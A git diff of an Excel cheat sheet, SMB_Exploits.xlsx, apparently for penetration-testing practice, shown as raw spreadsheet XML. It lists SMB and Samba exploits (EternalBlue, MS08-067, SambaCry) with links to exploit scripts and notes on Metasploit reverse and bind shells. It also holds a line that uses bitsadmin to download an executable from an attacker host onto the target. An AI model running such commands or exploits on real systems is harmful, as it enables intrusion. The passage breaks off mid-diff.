@@ -26,7 +26,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="110" uniqueCount="69">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="120" uniqueCount="74">
   <si>
     <t>Services</t>
   </si>
@@ -53,9 +53,6 @@
   </si>
   <si>
     <t>zzz_exploit.py with bind</t>
-  </si>
-  <si>
-    <t>Eternal Blue</t>
   </si>
   <si>
     <t>link</t>
@@ -443,6 +440,36 @@
   </si>
   <si>
     <t>https://github.com/amriunix/CVE-2007-2447/blob/master/usermap_script.py</t>
+  </si>
+  <si>
+    <t>MS08-067</t>
+  </si>
+  <si>
+    <r>
+      <t xml:space="preserve">Eternal Blue </t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="0"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>(MS17-010)</t>
+    </r>
+  </si>
+  <si>
+    <t>https://gist.githubusercontent.com/AfroThundr3007730/b433f420a792237440c836c06b4b32ab/raw/8d05319c15a5a9ec37433bf89dcd8790afe0cb0e/ms08_067.py</t>
+  </si>
+  <si>
+    <t>generate MSF rev shell</t>
+  </si>
+  <si>
+    <t>MSF Reverse shell</t>
+  </si>
+  <si>
+    <t>MSF Bind shell</t>
   </si>
 </sst>
 </file>
@@ -589,13 +616,13 @@
       <alignment horizontal="center"/>
     </xf>
     <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="1" applyBorder="1"/>
+    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1"/>
     <xf numFmtId="0" fontId="2" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
       <alignment horizontal="center"/>
     </xf>
     <xf numFmtId="0" fontId="6" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
       <alignment horizontal="left"/>
     </xf>
-    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1"/>
   </cellXfs>
   <cellStyles count="2">
     <cellStyle name="Hyperlink" xfId="1" builtinId="8"/>
@@ -911,10 +938,10 @@
 
 <file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{00000000-0001-0000-0000-000000000000}">
-  <dimension ref="A2:K17"/>
+  <dimension ref="A2:K18"/>
   <sheetViews>
     <sheetView showGridLines="0" tabSelected="1" workbookViewId="0">
-      <selection activeCell="B17" sqref="B17"/>
+      <selection activeCell="E8" sqref="E8"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
@@ -930,15 +957,15 @@
   </cols>
   <sheetData>
     <row r="2" spans="1:11" ht="18.75" x14ac:dyDescent="0.3">
-      <c r="B2" s="13" t="s">
-        <v>9</v>
-      </c>
-      <c r="C2" s="13"/>
-      <c r="D2" s="13"/>
-      <c r="E2" s="13"/>
-      <c r="F2" s="13"/>
+      <c r="B2" s="14" t="s">
+        <v>69</v>
+      </c>
+      <c r="C2" s="14"/>
+      <c r="D2" s="14"/>
+      <c r="E2" s="14"/>
+      <c r="F2" s="14"/>
       <c r="G2" s="8" t="s">
-        <v>18</v>
+        <v>17</v>
       </c>
     </row>
     <row r="3" spans="1:11" ht="18.75" x14ac:dyDescent="0.3">
@@ -950,20 +977,20 @@
       <c r="G3" s="8"/>
     </row>
     <row r="4" spans="1:11" x14ac:dyDescent="0.25">
-      <c r="B4" s="14" t="s">
-        <v>43</v>
-      </c>
-      <c r="C4" s="14"/>
-      <c r="D4" s="14"/>
-      <c r="E4" s="14"/>
+      <c r="B4" s="15" t="s">
+        <v>42</v>
+      </c>
+      <c r="C4" s="15"/>
+      <c r="D4" s="15"/>
+      <c r="E4" s="15"/>
       <c r="F4" s="10" t="s">
-        <v>59</v>
+        <v>58</v>
       </c>
       <c r="G4" s="8" t="s">
+        <v>56</v>
+      </c>
+      <c r="H4" t="s">
         <v>57</v>
-      </c>
-      <c r="H4" t="s">
-        <v>58</v>
       </c>
     </row>
     <row r="5" spans="1:11" ht="15.75" x14ac:dyDescent="0.25">
@@ -975,7 +1002,7 @@
         <v>3</v>
       </c>
       <c r="D5" s="3" t="s">
-        <v>46</v>
+        <v>45</v>
       </c>
       <c r="E5" s="3" t="s">
         <v>1</v>
@@ -984,16 +1011,16 @@
         <v>2</v>
       </c>
       <c r="G5" s="3" t="s">
-        <v>10</v>
+        <v>9</v>
       </c>
       <c r="H5" s="3" t="s">
-        <v>12</v>
+        <v>11</v>
       </c>
       <c r="I5" s="3" t="s">
-        <v>14</v>
+        <v>13</v>
       </c>
       <c r="J5" s="2" t="s">
-        <v>16</v>
+        <v>15</v>
       </c>
       <c r="K5" s="2"/>
     </row>
@@ -1013,88 +1040,88 @@
     <row r="7" spans="1:11" ht="15.75" x14ac:dyDescent="0.25">
       <c r="A7" s="2"/>
       <c r="B7" s="5" t="s">
-        <v>52</v>
+        <v>51</v>
       </c>
       <c r="C7" s="5" t="s">
         <v>4</v>
       </c>
       <c r="D7" s="5" t="s">
-        <v>47</v>
+        <v>68</v>
       </c>
       <c r="E7" s="4" t="s">
-        <v>5</v>
+        <v>73</v>
       </c>
       <c r="F7" s="4" t="s">
-        <v>5</v>
-      </c>
-      <c r="G7" s="6" t="s">
-        <v>15</v>
+        <v>72</v>
+      </c>
+      <c r="G7" s="12" t="s">
+        <v>70</v>
       </c>
       <c r="H7" s="5" t="s">
-        <v>13</v>
-      </c>
-      <c r="I7" s="5" t="s">
-        <v>4</v>
-      </c>
-      <c r="J7" s="7" t="s">
-        <v>17</v>
+        <v>12</v>
+      </c>
+      <c r="I7" s="5"/>
+      <c r="J7" s="2" t="s">
+        <v>71</v>
       </c>
       <c r="K7" s="2"/>
     </row>
     <row r="8" spans="1:11" ht="15.75" x14ac:dyDescent="0.25">
       <c r="A8" s="2"/>
       <c r="B8" s="5" t="s">
-        <v>52</v>
+        <v>51</v>
       </c>
       <c r="C8" s="5" t="s">
-        <v>6</v>
+        <v>4</v>
       </c>
       <c r="D8" s="5" t="s">
-        <v>44</v>
+        <v>46</v>
       </c>
       <c r="E8" s="4" t="s">
-        <v>8</v>
+        <v>5</v>
       </c>
       <c r="F8" s="4" t="s">
-        <v>7</v>
-      </c>
-      <c r="G8" s="6" t="s">
-        <v>11</v>
+        <v>5</v>
+      </c>
+      <c r="G8" s="12" t="s">
+        <v>14</v>
       </c>
       <c r="H8" s="5" t="s">
-        <v>13</v>
+        <v>12</v>
       </c>
       <c r="I8" s="5" t="s">
-        <v>6</v>
-      </c>
-      <c r="J8" s="2"/>
+        <v>4</v>
+      </c>
+      <c r="J8" s="7" t="s">
+        <v>16</v>
+      </c>
       <c r="K8" s="2"/>
     </row>
     <row r="9" spans="1:11" ht="15.75" x14ac:dyDescent="0.25">
       <c r="A9" s="2"/>
       <c r="B9" s="5" t="s">
-        <v>52</v>
+        <v>51</v>
       </c>
       <c r="C9" s="5" t="s">
         <v>6</v>
       </c>
       <c r="D9" s="5" t="s">
-        <v>45</v>
+        <v>43</v>
       </c>
       <c r="E9" s="4" t="s">
-        <v>5</v>
+        <v>8</v>
       </c>
       <c r="F9" s="4" t="s">
-        <v>5</v>
-      </c>
-      <c r="G9" s="6" t="s">
-        <v>15</v>
+        <v>7</v>
+      </c>
+      <c r="G9" s="12" t="s">
+        <v>10</v>
       </c>
       <c r="H9" s="5" t="s">
-        <v>13</v>
+        <v>12</v>
       </c>
       <c r="I9" s="5" t="s">
-        <v>19</v>
+        <v>6</v>
       </c>
       <c r="J9" s="2"/>
       <c r="K9" s="2"/>
@@ -1102,82 +1129,84 @@
     <row r="10" spans="1:11" ht="15.75" x14ac:dyDescent="0.25">
       <c r="A10" s="2"/>
       <c r="B10" s="5" t="s">
-        <v>52</v>
+        <v>51</v>
       </c>
       <c r="C10" s="5" t="s">
-        <v>20</v>
+        <v>6</v>
       </c>
       <c r="D10" s="5" t="s">
-        <v>41</v>
-      </c>
-      <c r="E10" s="4"/>
+        <v>44</v>
+      </c>
+      <c r="E10" s="4" t="s">
+        <v>5</v>
+      </c>
       <c r="F10" s="4" t="s">
-        <v>40</v>
+        <v>5</v>
       </c>
       <c r="G10" s="6" t="s">
-        <v>11</v>
+        <v>14</v>
       </c>
       <c r="H10" s="5" t="s">
-        <v>13</v>
+        <v>12</v>
       </c>
       <c r="I10" s="5" t="s">
-        <v>42</v>
-      </c>
-      <c r="J10" s="2" t="s">
-        <v>64</v>
-      </c>
+        <v>18</v>
+      </c>
+      <c r="J10" s="2"/>
       <c r="K10" s="2"/>
     </row>
     <row r="11" spans="1:11" ht="15.75" x14ac:dyDescent="0.25">
       <c r="A11" s="2"/>
       <c r="B11" s="5" t="s">
-        <v>52</v>
+        <v>51</v>
       </c>
       <c r="C11" s="5" t="s">
-        <v>6</v>
+        <v>19</v>
       </c>
       <c r="D11" s="5" t="s">
-        <v>41</v>
+        <v>40</v>
       </c>
       <c r="E11" s="4"/>
       <c r="F11" s="4" t="s">
-        <v>48</v>
+        <v>39</v>
       </c>
       <c r="G11" s="6" t="s">
-        <v>11</v>
+        <v>10</v>
       </c>
       <c r="H11" s="5" t="s">
-        <v>13</v>
+        <v>12</v>
       </c>
       <c r="I11" s="5" t="s">
-        <v>6</v>
-      </c>
-      <c r="J11" s="2"/>
+        <v>41</v>
+      </c>
+      <c r="J11" s="2" t="s">
+        <v>63</v>
+      </c>
       <c r="K11" s="2"/>
     </row>
     <row r="12" spans="1:11" ht="15.75" x14ac:dyDescent="0.25">
       <c r="A12" s="2"/>
-      <c r="B12" s="5">
-        <v>139</v>
+      <c r="B12" s="5" t="s">
+        <v>51</v>
       </c>
       <c r="C12" s="5" t="s">
-        <v>49</v>
+        <v>6</v>
       </c>
       <c r="D12" s="5" t="s">
-        <v>53</v>
+        <v>40</v>
       </c>
       <c r="E12" s="4"/>
       <c r="F12" s="4" t="s">
-        <v>51</v>
-      </c>
-      <c r="G12" s="12" t="s">
-        <v>50</v>
+        <v>47</v>
+      </c>
+      <c r="G12" s="6" t="s">
+        <v>10</v>
       </c>
       <c r="H12" s="5" t="s">
-        <v>13</v>
+        <v>12</v>
       </c>
       <c r="I12" s="5" t="s">
-        <v>49</v>
+        <v>6</v>
       </c>
       <c r="J12" s="2"/>
       <c r="K12" s="2"/>
@@ -1188,23 +1217,23 @@
         <v>139</v>
       </c>
       <c r="C13" s="5" t="s">
-        <v>54</v>
+        <v>48</v>
       </c>
       <c r="D13" s="5" t="s">
-        <v>53</v>
+        <v>52</v>
       </c>
       <c r="E13" s="4"/>
       <c r="F13" s="4" t="s">
-        <v>51</v>
+        <v>50</v>
       </c>
       <c r="G13" s="12" t="s">
-        <v>50</v>
+        <v>49</v>
       </c>
       <c r="H13" s="5" t="s">
-        <v>13</v>
+        <v>12</v>
       </c>
       <c r="I13" s="5" t="s">
-        <v>56</v>
+        <v>48</v>
       </c>
       <c r="J13" s="2"/>
       <c r="K13" s="2"/>
@@ -1215,99 +1244,131 @@
         <v>139</v>
       </c>
       <c r="C14" s="5" t="s">
-        <v>55</v>
+        <v>53</v>
       </c>
       <c r="D14" s="5" t="s">
-        <v>53</v>
+        <v>52</v>
       </c>
       <c r="E14" s="4"/>
       <c r="F14" s="4" t="s">
-        <v>51</v>
+        <v>50</v>
       </c>
       <c r="G14" s="12" t="s">
-        <v>50</v>
+        <v>49</v>
       </c>
       <c r="H14" s="5" t="s">
-        <v>13</v>
+        <v>12</v>
       </c>
       <c r="I14" s="5" t="s">
-        <v>56</v>
+        <v>55</v>
       </c>
       <c r="J14" s="2"/>
       <c r="K14" s="2"/>
     </row>
     <row r="15" spans="1:11" ht="15.75" x14ac:dyDescent="0.25">
       <c r="A15" s="2"/>
-      <c r="B15" s="4" t="s">
-        <v>62</v>
+      <c r="B15" s="5">
+        <v>139</v>
       </c>
       <c r="C15" s="5" t="s">
-        <v>61</v>
+        <v>54</v>
       </c>
       <c r="D15" s="5" t="s">
-        <v>60</v>
+        <v>52</v>
       </c>
       <c r="E15" s="4"/>
       <c r="F15" s="4" t="s">
-        <v>63</v>
-      </c>
-      <c r="G15" s="4"/>
+        <v>50</v>
+      </c>
+      <c r="G15" s="12" t="s">
+        <v>49</v>
+      </c>
       <c r="H15" s="5" t="s">
-        <v>13</v>
-      </c>
-      <c r="I15" s="5"/>
+        <v>12</v>
+      </c>
+      <c r="I15" s="5" t="s">
+        <v>55</v>
+      </c>
       <c r="J15" s="2"/>
       <c r="K15" s="2"/>
     </row>
     <row r="16" spans="1:11" ht="15.75" x14ac:dyDescent="0.25">
       <c r="A16" s="2"/>
-      <c r="B16" s="5">
-        <v>445</v>
+      <c r="B16" s="4" t="s">
+        <v>61</v>
       </c>
       <c r="C16" s="5" t="s">
-        <v>61</v>
+        <v>60</v>
       </c>
       <c r="D16" s="5" t="s">
-        <v>67</v>
+        <v>59</v>
       </c>
       <c r="E16" s="4"/>
       <c r="F16" s="4" t="s">
-        <v>65</v>
-      </c>
-      <c r="G16" s="12" t="s">
-        <v>66</v>
-      </c>
+        <v>62</v>
+      </c>
+      <c r="G16" s="4"/>
       <c r="H16" s="5" t="s">
-        <v>13</v>
-      </c>
-      <c r="I16" s="5" t="s">
-        <v>49</v>
-      </c>
+        <v>12</v>
+      </c>
+      <c r="I16" s="5"/>
       <c r="J16" s="2"/>
       <c r="K16" s="2"/>
     </row>
-    <row r="17" spans="2:9" ht="15.75" x14ac:dyDescent="0.25">
-      <c r="B17" s="15" t="s">
-        <v>62</v>
+    <row r="17" spans="1:11" ht="15.75" x14ac:dyDescent="0.25">
+      <c r="A17" s="2"/>
+      <c r="B17" s="5">
+        <v>445</v>
       </c>
       <c r="C17" s="5" t="s">
-        <v>61</v>
+        <v>60</v>
       </c>
       <c r="D17" s="5" t="s">
-        <v>67</v>
+        <v>66</v>
       </c>
       <c r="E17" s="4"/>
       <c r="F17" s="4" t="s">
+        <v>64</v>
+      </c>
+      <c r="G17" s="12" t="s">
         <v>65</v>
       </c>
-      <c r="G17" s="8" t="s">
-        <v>68</v>
-      </c>
       <c r="H17" s="5" t="s">
-        <v>13</v>
+        <v>12</v>
       </c>
       <c r="I17" s="5" t="s">
-        <v>49</v>
+        <v>48</v>
+      </c>
+      <c r="J17" s="2" t="s">
+        <v>71</v>
+      </c>
+      <c r="K17" s="2"/>
+    </row>
+    <row r="18" spans="1:11" ht="15.75" x14ac:dyDescent="0.25">
+      <c r="B18" s="13" t="s">
+        <v>61</v>
+      </c>
+      <c r="C18" s="5" t="s">
+        <v>60</v>
+      </c>
+      <c r="D18" s="5" t="s">
+        <v>66</v>
+      </c>
+      <c r="E18" s="4"/>
+      <c r="F18" s="4" t="s">
+        <v>64</v>
+      </c>
+      <c r="G18" s="8" t="s">
+        <v>67</v>
+      </c>
+      <c r="H18" s="5" t="s">
+        <v>12</v>
+      </c>
+      <c r="I18" s="5" t="s">
+        <v>48</v>
+      </c>
+      <c r="J18" s="2" t="s">
+        <v>71</v>
       </c>
     </row>
   </sheetData>
@@ -1316,21 +1377,22 @@
     <mergeCell ref="B4:E4"/>
   </mergeCells>
   <hyperlinks>
-    <hyperlink ref="G8" r:id="rId1" xr:uid="{00000000-0004-0000-0000-000000000000}"/>
-    <hyperlink ref="G7" r:id="rId2" xr:uid="{00000000-0004-0000-0000-000001000000}"/>
+    <hyperlink ref="G9" r:id="rId1" xr:uid="{00000000-0004-0000-0000-000000000000}"/>
+    <hyperlink ref="G8" r:id="rId2" xr:uid="{00000000-0004-0000-0000-000001000000}"/>
     <hyperlink ref="G2" r:id="rId3" xr:uid="{00000000-0004-0000-0000-000002000000}"/>
-    <hyperlink ref="G9" r:id="rId4" xr:uid="{00000000-0004-0000-0000-000003000000}"/>
-    <hyperlink ref="G10" r:id="rId5" xr:uid="{00000000-0004-0000-0000-000004000000}"/>
-    <hyperlink ref="G11" r:id="rId6" xr:uid="{00000000-0004-0000-0000-000005000000}"/>
-    <hyperlink ref="G12" r:id="rId7" xr:uid="{00000000-0004-0000-0000-000006000000}"/>
-    <hyperlink ref="G13" r:id="rId8" xr:uid="{00000000-0004-0000-0000-000007000000}"/>
-    <hyperlink ref="G14" r:id="rId9" xr:uid="{00000000-0004-0000-0000-000008000000}"/>
+    <hyperlink ref="G10" r:id="rId4" xr:uid="{00000000-0004-0000-0000-000003000000}"/>
+    <hyperlink ref="G11" r:id="rId5" xr:uid="{00000000-0004-0000-0000-000004000000}"/>
+    <hyperlink ref="G12" r:id="rId6" xr:uid="{00000000-0004-0000-0000-000005000000}"/>
+    <hyperlink ref="G13" r:id="rId7" xr:uid="{00000000-0004-0000-0000-000006000000}"/>
+    <hyperlink ref="G14" r:id="rId8" xr:uid="{00000000-0004-0000-0000-000007000000}"/>
+    <hyperlink ref="G15" r:id="rId9" xr:uid="{00000000-0004-0000-0000-000008000000}"/>
     <hyperlink ref="G4" r:id="rId10" xr:uid="{00000000-0004-0000-0000-000009000000}"/>
-    <hyperlink ref="G16" r:id="rId11" xr:uid="{00000000-0004-0000-0000-00000A000000}"/>
-    <hyperlink ref="G17" r:id="rId12" xr:uid="{F90627F5-38C7-481B-86A9-6F902D90064F}"/>
+    <hyperlink ref="G17" r:id="rId11" xr:uid="{00000000-0004-0000-0000-00000A000000}"/>
+    <hyperlink ref="G18" r:id="rId12" xr:uid="{F90627F5-38C7-481B-86A9-6F902D90064F}"/>
+    <hyperlink ref="G7" r:id="rId13" xr:uid="{D04D8C2B-67E6-4AC9-B20C-904EDB232B16}"/>
   </hyperlinks>
   <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
-  <pageSetup orientation="portrait" r:id="rId13"/>
+  <pageSetup orientation="portrait" r:id="rId14"/>
 </worksheet>
 </file>
 
@@ -1349,97 +1411,97 @@
   <sheetData>
     <row r="1" spans="1:1" ht="17.25" x14ac:dyDescent="0.25">
       <c r="A1" s="9" t="s">
-        <v>21</v>
+        <v>20</v>
       </c>
     </row>
     <row r="2" spans="1:1" ht="17.25" x14ac:dyDescent="0.25">
       <c r="A2" s="9" t="s">
-        <v>22</v>
+        <v>21</v>
       </c>
     </row>
     <row r="3" spans="1:1" ht="17.25" x14ac:dyDescent="0.25">
       <c r="A3" s="9" t="s">
-        <v>23</v>
+        <v>22</v>
       </c>
     </row>
     <row r="4" spans="1:1" ht="17.25" x14ac:dyDescent="0.25">
       <c r="A4" s="9" t="s">
-        <v>24</v>
+        <v>23</v>
       </c>
     </row>
     <row r="5" spans="1:1" ht="17.25" x14ac:dyDescent="0.25">
       <c r="A5" s="9" t="s">
-        <v>25</v>
+        <v>24</v>
       </c>
     </row>
     <row r="6" spans="1:1" ht="17.25" x14ac:dyDescent="0.25">
       <c r="A6" s="9" t="s">
-        <v>26</v>
+        <v>25</v>
       </c>
     </row>
     <row r="7" spans="1:1" ht="17.25" x14ac:dyDescent="0.25">
       <c r="A7" s="9" t="s">
-        <v>27</v>
+        <v>26</v>
       </c>
     </row>
     <row r="8" spans="1:1" ht="17.25" x14ac:dyDescent="0.25">
       <c r="A8" s="9" t="s">
-        <v>28</v>
+        <v>27</v>
       </c>
     </row>
     <row r="9" spans="1:1" ht="17.25" x14ac:dyDescent="0.25">
       <c r="A9" s="9" t="s">
-        <v>29</v>
+        <v>28</v>
       </c>
     </row>
     <row r="10" spans="1:1" ht="17.25" x14ac:dyDescent="0.25">
       <c r="A10" s="9" t="s">
-        <v>30</v>
+        <v>29</v>
       </c>
     </row>
     <row r="11" spans="1:1" ht="17.25" x14ac:dyDescent="0.25">
       <c r="A11" s="9" t="s">
-        <v>31</v>
+        <v>30</v>
       </c>
     </row>
     <row r="12" spans="1:1" ht="17.25" x14ac:dyDescent="0.25">
       <c r="A12" s="9" t="s">
-        <v>32</v>
+        <v>31</v>
       </c>
     </row>
     <row r="13" spans="1:1" ht="17.25" x14ac:dyDescent="0.25">
       <c r="A13" s="9" t="s">
-        <v>33</v>
+        <v>32</v>
       </c>
     </row>
     <row r="14" spans="1:1" ht="17.25" x14ac:dyDescent="0.25">
       <c r="A14" s="9" t="s">
-        <v>34</v>
+        <v>33</v>
       </c>
     </row>
     <row r="15" spans="1:1" ht="17.25" x14ac:dyDescent="0.25">
       <c r="A15" s="9" t="s">
-        <v>35</v>
+        <v>34</v>
       </c>
     </row>
     <row r="16" spans="1:1" ht="17.25" x14ac:dyDescent="0.25">
       <c r="A16" s="9" t="s">
-        <v>36</v>
+        <v>35</v>
       </c>
     </row>
     <row r="17" spans="1:1" ht="17.25" x14ac:dyDescent="0.25">
       <c r="A17" s="9" t="s">
-        <v>37</v>
+        <v>36</v>
       </c>
     </row>
     <row r="18" spans="1:1" ht="17.25" x14ac:dyDescent="0.25">
       <c r="A18" s="9" t="s">
-        <v>38</v>
+        <v>37</v>
       </c>
     </row>
     <row r="19" spans="1:1" ht="17.25" x14ac:dyDescent="0.25">
       <c r="A19" s="9" t="s">
-        <v>39</v>
+        <v>38</v>
       </c>
     </row>
   </sheetData>

--- a/SMB_Exploits.xlsx
+++ b/SMB_Exploits.xlsx
@@ -8,7 +8,7 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="C:\Users\ashwi\Documents\Cheatsheets\"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{33FBE3F6-49C2-409F-91F3-7D1F8E047C0C}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{532114FD-9629-4551-ACC5-60CF801739E5}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
     <workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11310" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
   </bookViews>
@@ -26,7 +26,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="120" uniqueCount="74">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="124" uniqueCount="78">
   <si>
     <t>Services</t>
   </si>
@@ -71,9 +71,6 @@
   </si>
   <si>
     <t>https://github.com/worawit/MS17-010</t>
-  </si>
-  <si>
-    <t>manual command</t>
   </si>
   <si>
     <t>service_exec(conn, r'cmd /c bitsadmin /transfer pwn /download http://10.10.0.1/sc.exe C:\sc.exe')
@@ -409,22 +406,13 @@
     <t>https://github.com/rewardone/OSCPRepo/blob/master/scripts/recon_enum/smbver.sh</t>
   </si>
   <si>
-    <t xml:space="preserve"> </t>
-  </si>
-  <si>
     <t>Check smb version : -</t>
   </si>
   <si>
-    <t>V 4.5</t>
-  </si>
-  <si>
     <t>linux</t>
   </si>
   <si>
     <t>139/445</t>
-  </si>
-  <si>
-    <t>MSF is_known_pipename</t>
   </si>
   <si>
     <t>Grooms 13</t>
@@ -470,6 +458,30 @@
   </si>
   <si>
     <t>MSF Bind shell</t>
+  </si>
+  <si>
+    <t>https://github.com/helviojunior/MS17-010</t>
+  </si>
+  <si>
+    <t>https://github.com/joxeankoret/CVE-2017-7494</t>
+  </si>
+  <si>
+    <t>is_known_pipename</t>
+  </si>
+  <si>
+    <t xml:space="preserve">wannacry </t>
+  </si>
+  <si>
+    <t>v 3.5.0 &lt; 4.64</t>
+  </si>
+  <si>
+    <t>https://medium.com/@bondo.mike/sambacry-rce-cve-2017-7494-41c3dcc0b7ae</t>
+  </si>
+  <si>
+    <t>Comment</t>
+  </si>
+  <si>
+    <t>modify user/pass in exploit</t>
   </si>
 </sst>
 </file>
@@ -562,7 +574,7 @@
       </patternFill>
     </fill>
   </fills>
-  <borders count="2">
+  <borders count="3">
     <border>
       <left/>
       <right/>
@@ -585,12 +597,21 @@
       </bottom>
       <diagonal/>
     </border>
+    <border>
+      <left/>
+      <right/>
+      <top/>
+      <bottom style="thin">
+        <color indexed="64"/>
+      </bottom>
+      <diagonal/>
+    </border>
   </borders>
   <cellStyleXfs count="2">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
     <xf numFmtId="0" fontId="1" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
   </cellStyleXfs>
-  <cellXfs count="16">
+  <cellXfs count="17">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
       <alignment horizontal="center" vertical="center"/>
@@ -621,6 +642,9 @@
       <alignment horizontal="center"/>
     </xf>
     <xf numFmtId="0" fontId="6" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
+      <alignment horizontal="left"/>
+    </xf>
+    <xf numFmtId="0" fontId="1" fillId="0" borderId="2" xfId="1" applyBorder="1" applyAlignment="1">
       <alignment horizontal="left"/>
     </xf>
   </cellXfs>
@@ -941,31 +965,31 @@
   <dimension ref="A2:K18"/>
   <sheetViews>
     <sheetView showGridLines="0" tabSelected="1" workbookViewId="0">
-      <selection activeCell="E8" sqref="E8"/>
+      <selection activeCell="G4" sqref="G4:H4"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
   <cols>
     <col min="3" max="3" width="9.140625" style="1"/>
     <col min="4" max="4" width="14.140625" style="1" bestFit="1" customWidth="1"/>
-    <col min="5" max="5" width="26.5703125" customWidth="1"/>
+    <col min="5" max="5" width="24.140625" customWidth="1"/>
     <col min="6" max="6" width="26.28515625" bestFit="1" customWidth="1"/>
     <col min="7" max="7" width="51.28515625" customWidth="1"/>
     <col min="8" max="8" width="10.28515625" bestFit="1" customWidth="1"/>
     <col min="9" max="9" width="12.42578125" style="1" customWidth="1"/>
-    <col min="10" max="10" width="28.85546875" customWidth="1"/>
+    <col min="10" max="10" width="25.85546875" customWidth="1"/>
   </cols>
   <sheetData>
     <row r="2" spans="1:11" ht="18.75" x14ac:dyDescent="0.3">
       <c r="B2" s="14" t="s">
-        <v>69</v>
+        <v>65</v>
       </c>
       <c r="C2" s="14"/>
       <c r="D2" s="14"/>
       <c r="E2" s="14"/>
       <c r="F2" s="14"/>
       <c r="G2" s="8" t="s">
-        <v>17</v>
+        <v>16</v>
       </c>
     </row>
     <row r="3" spans="1:11" ht="18.75" x14ac:dyDescent="0.3">
@@ -978,20 +1002,18 @@
     </row>
     <row r="4" spans="1:11" x14ac:dyDescent="0.25">
       <c r="B4" s="15" t="s">
-        <v>42</v>
+        <v>41</v>
       </c>
       <c r="C4" s="15"/>
       <c r="D4" s="15"/>
       <c r="E4" s="15"/>
       <c r="F4" s="10" t="s">
-        <v>58</v>
-      </c>
-      <c r="G4" s="8" t="s">
         <v>56</v>
       </c>
-      <c r="H4" t="s">
-        <v>57</v>
-      </c>
+      <c r="G4" s="16" t="s">
+        <v>55</v>
+      </c>
+      <c r="H4" s="16"/>
     </row>
     <row r="5" spans="1:11" ht="15.75" x14ac:dyDescent="0.25">
       <c r="A5" s="2"/>
@@ -1002,7 +1024,7 @@
         <v>3</v>
       </c>
       <c r="D5" s="3" t="s">
-        <v>45</v>
+        <v>44</v>
       </c>
       <c r="E5" s="3" t="s">
         <v>1</v>
@@ -1019,8 +1041,8 @@
       <c r="I5" s="3" t="s">
         <v>13</v>
       </c>
-      <c r="J5" s="2" t="s">
-        <v>15</v>
+      <c r="J5" s="3" t="s">
+        <v>76</v>
       </c>
       <c r="K5" s="2"/>
     </row>
@@ -1040,42 +1062,44 @@
     <row r="7" spans="1:11" ht="15.75" x14ac:dyDescent="0.25">
       <c r="A7" s="2"/>
       <c r="B7" s="5" t="s">
-        <v>51</v>
+        <v>50</v>
       </c>
       <c r="C7" s="5" t="s">
         <v>4</v>
       </c>
       <c r="D7" s="5" t="s">
+        <v>64</v>
+      </c>
+      <c r="E7" s="4" t="s">
+        <v>69</v>
+      </c>
+      <c r="F7" s="4" t="s">
         <v>68</v>
       </c>
-      <c r="E7" s="4" t="s">
-        <v>73</v>
-      </c>
-      <c r="F7" s="4" t="s">
-        <v>72</v>
-      </c>
       <c r="G7" s="12" t="s">
-        <v>70</v>
+        <v>66</v>
       </c>
       <c r="H7" s="5" t="s">
         <v>12</v>
       </c>
-      <c r="I7" s="5"/>
+      <c r="I7" s="5" t="s">
+        <v>4</v>
+      </c>
       <c r="J7" s="2" t="s">
-        <v>71</v>
+        <v>67</v>
       </c>
       <c r="K7" s="2"/>
     </row>
     <row r="8" spans="1:11" ht="15.75" x14ac:dyDescent="0.25">
       <c r="A8" s="2"/>
       <c r="B8" s="5" t="s">
-        <v>51</v>
+        <v>50</v>
       </c>
       <c r="C8" s="5" t="s">
         <v>4</v>
       </c>
       <c r="D8" s="5" t="s">
-        <v>46</v>
